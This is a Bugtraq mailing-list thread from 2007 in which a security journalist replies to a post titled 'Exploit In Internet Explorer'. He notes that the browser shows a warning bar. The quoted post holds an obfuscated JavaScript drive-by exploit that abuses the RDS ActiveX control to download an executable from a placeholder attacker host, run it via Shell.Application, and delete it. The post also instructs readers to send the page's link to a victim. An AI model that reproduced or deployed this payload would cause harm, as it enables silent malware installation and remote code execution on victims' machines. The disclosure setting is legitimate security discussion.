I get the browser warning bar: "This web site wants to run the following add-on: 'Microsoft Data Access - Remote Data Services Dat...' from 'Microsoft Corporation'. If you trust the web site and the add-on and want to allow it to run, click here..." Looks like a message to me. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.eweek.com/cheap_hack/ Contributing Editor, PC Magazine larryseltzer@xxxxxxxxxxxxx -----Original Message----- From: RaeD@xxxxxxxxxxx [mailto:RaeD@xxxxxxxxxxx] Sent: Sunday, July 29, 2007 4:58 AM To: bugtraq@xxxxxxxxxxxxxxxxx Subject: Exploit In Internet Explorer Discovred By : Hasadya Raed Contact : RaeD@xxxxxxxxxxx - Israel ----------------------------------- Now You Can To Download Exe Files And To Run Without Msgs : Exploit : <html> <script> var dc=document.write; var sc=String.fromCharCode; var exe="http://www.Attacker.com/sever.exe"; dc(sc(60,115,99,114,105,112,116,62,118,97,114,32,97,105,108,105,97,110,4 4,122,104,97,110,44,99,109,100,115,115,59,97,105,108,105,97,110,61,34) + exe + sc(34,59,122,104,97,110,61,34,119,105,110,46,101,120,101,34,59,99,109,10 0,115,115,61,34,99,109,100,46,101,120,101,34,59,116,114,121,123,118,97,1 14,32,97,100,111,61,40,100,111,99,117,109,101,110,116,46,99,114,101,97,1 16,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,41,5 9,118,97,114,32,100,61,49,59,97,100,111,46,115,101,116,65,116,116,114,10 5,98,117,116,101,40,34,99,108,97,115,115,105,100,34,44,34,99,108,115,105 ,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,5 1,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,41,59,118,97,114,32,101,6 1,49,59,118,97,114,32,120,109,108,61,97,100,111,46,67,114,101,97,116,101 ,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,7 6,72,84,84,80,34,44,34,34,41,59,118,97,114,32,102,61,49,59,118,97,114,32 ,108,110,61,34,65,100,111,34,59,118,97,114,32,1 08,122,110,61,34,100,98,46,83,116,34,59,118,97,114,32,97,110,61,34,114,1 01,97,109,34,59,118,97,114,32,103,61,49,59,118,97,114,32,97,115,61,97,10 0,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,108,110,43,108,1 22,110,43,97,110,44,34,34,41,59,118,97,114,32,104,61,49,59,120,109,108,4 6,79,112,101,110,40,34,71,69,84,34,44,97,105,108,105,97,110,44,48,41,59, 120,109,108,46,83,101,110,100,40,41,59,97,115,46,116,121,112,101,61,49,5 9,118,97,114,32,110,61,49,59,97,115,46,111,112,101,110,40,41,59,97,115,4 6,119,114,105,116,101,40,120,109,108,46,114,101,115,112,111,110,115,101, 66,111,100,121,41,59,97,115,46,115,97,118,101,116,111,102,105,108,101,40 ,122,104,97,110,44,50,41,59,97,115,46,99,108,111,115,101,40,41,59,118,97 ,114,32,115,104,101,108,108,61,97,100,111,46,99,114,101,97,116,101,111,9 8,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,11 6,105,111,110,34,44,34,34,41,59,115,104,101,108,108,46,83,104,101,108,10 8,69,120,101,99,117,116,101,40,122,104,97,110,44,34,3 4,44,34,34,44,34,111,112,101,110,34,44,48,41,59,115,104,101,108,108,46,8 3,104,101,108,108,69,120,101,99,117,116,101,40,99,109,100,115,115,44,34, 32,47,99,32,100,101,108,32,47,83,32,47,81,32,47,70,32,34,43,122,104,97,1 10,44,34,34,44,34,111,112,101,110,34,44,48,41,59,125,99,97,116,99,104,40 ,101,41,123,125,59,60,47,115,99,114,105,112,116,62)); ;By Fox TeaM </script> </html> ------------------------------------------------- Save As Html File , And Send The Link To Victim ------------------------------------------------- By Hasadya Raed - Israel